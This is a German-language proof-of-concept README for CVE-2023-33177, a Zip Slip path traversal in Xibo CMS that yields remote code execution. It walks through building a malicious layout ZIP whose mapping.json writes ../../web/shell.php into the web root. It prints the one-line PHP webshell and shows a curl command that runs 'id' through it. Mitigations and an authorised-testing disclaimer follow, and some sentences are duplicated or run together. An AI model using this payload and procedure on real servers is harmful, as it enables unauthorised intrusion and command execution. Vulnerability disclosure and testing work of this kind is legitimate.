
Dieser Exploit demonstriert eine **Path-Traversal-Schwachstelle** in Xibo CMS (CVE-2023-33177), die eine Remote-Codeausführung durch schädliche Layout-Importe ermöglicht.
Dieser Exploit demonstriert eine Path-Traversal-Schwachstelle in Xibo CMS (CVE-2023-33177), die Remote-Codeausführung durch bösartige Layout-Importe ermöglicht.
CVE/Advisory: CVE-2023-33177 Betroffene Versionen:
Schwachstellentyp: Path Traversal (Zip Slip) Auswirkung: Remote-Codeausführung (RCE)
Xibo CMS erlaubt authentifizierten Benutzern das Importieren von Layout-Dateien über ZIP-Archive. Die Importfunktion validiert die Dateipfade in der Datei mapping.json nicht ordnungsgemäß, sodass ein Angreifer mithilfe von Path-Traversal-Sequenzen (../../) Dateien außerhalb des vorgesehenen Bibliotheksverzeichnisses schreiben kann.
mapping.json ein: Verwendet ../../web/shell.php als Dateipfadlibrary/../../web/shell.php/var/www/cms/web/shell.php aufgelöstZip contains: library/../../web/shell.php
Xibo reads: library/ + ../../web/shell.php (from mapping.json)
Xibo writes: /var/www/cms/library/temp/ + ../../web/shell.php
Result: /var/www/cms/web/shell.php ← Webshell in web root!
python3 create_exploit.py
Dies erstellt exploit.zip mit dem bösartigen Layout-Paket.
xibo_admin / password)exploit.zip hochcurl 'http://localhost:8080/shell.php?cmd=id'
Das Exploit-ZIP enthält:
exploit.zip
├── layout.json # Valid Xibo layout definition
├── playlist.json # Empty playlist (triggers JSON import)
├── mapping.json # Contains path traversal payload
└── library/
└── ../../web/
└── shell.php # PHP webshell (gets extracted to web root)
Die eingebettete Webshell ist minimalistisch:
<?php system($_GET["cmd"]); ?>
Zugriff über: http://<target>/shell.php?cmd=<command>
Behobene Versionen:
Schutzmaßnahmen:
.. oder absolute Pfade ablehnenDieser Exploit wird bereitgestellt für:
Verwenden Sie diesen Exploit nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Genehmigung zum Testen haben.
complexusprada November 2025